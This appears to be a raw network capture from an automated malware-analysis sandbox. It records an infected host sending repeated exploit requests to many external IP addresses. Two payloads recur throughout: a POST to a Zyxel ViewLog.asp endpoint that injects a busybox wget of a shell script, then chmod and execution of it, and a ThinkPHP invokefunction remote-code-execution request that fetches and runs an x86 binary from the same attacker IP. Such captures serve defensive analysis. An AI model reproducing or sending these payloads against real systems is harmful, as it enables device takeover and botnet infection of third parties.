                                                        Feb 14, 2024 09:34:17.463428974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.145610094.123.47.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.468014956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.145130031.200.89.748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.469182968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.145633494.120.97.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.469285965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.146089695.168.184.4380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.550324917 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.742917061 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:48 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.144141895.213.18.20380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.569339037 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.781130075 CET325INHTTP/1.1 400 Bad Request
                                                        Server: kittenx/1.18.0
                                                        Date: Wed, 14 Feb 2024 08:34:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 159
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.143531095.110.157.19980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.575073004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.793106079 CET461INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:26:43 GMT
                                                        Server: Apache
                                                        Content-Length: 283
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 66 61 75 6c 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at default Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.144450495.39.49.18480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.591372967 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.825479031 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:34:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.143761095.181.193.21980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.597492933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.144929495.86.125.12880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.611335993 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.143711095.0.9.14080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.622905970 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.888005972 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:17 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.143933495.58.77.8080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.661417007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.965614080 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:34:17.966099977 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.144900062.171.141.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.919886112 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.140775919 CET659INHTTP/1.1 401 Unauthorized
                                                        Access-Control-Allow-Credentials: true
                                                        Access-Control-Allow-Headers: Accept, Accept-Encoding, Authorization, Cache-Control, Content-Type, Content-Length, Origin, X-Real-IP, X-CSRF-Token
                                                        Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
                                                        Access-Control-Allow-Origin: http://62.171.141.162
                                                        Access-Control-Max-Age: 7200
                                                        Content-Type: application/json; charset=utf-8
                                                        Www-Authenticate: Bearer
                                                        X-Request-Id: e27d36b1-e8a9-4cd5-8636-fbc8dcf94dc0
                                                        Date: Wed, 14 Feb 2024 08:34:18 GMT
                                                        Content-Length: 77
                                                        Connection: close
                                                        Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 54 68 65 20 72 65 71 75 69 72 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 68 65 61 64 73 20 77 65 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e 22 7d
                                                        Data Ascii: {"error":"The required authorization heads were not present in the request."}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.145287685.146.209.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.934252024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.166155100 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:16 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.144968231.136.94.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:18.361156940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:19.046027899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:20.389962912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:23.077862978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.453629971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:39.205400944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.732311964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:44.738595963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
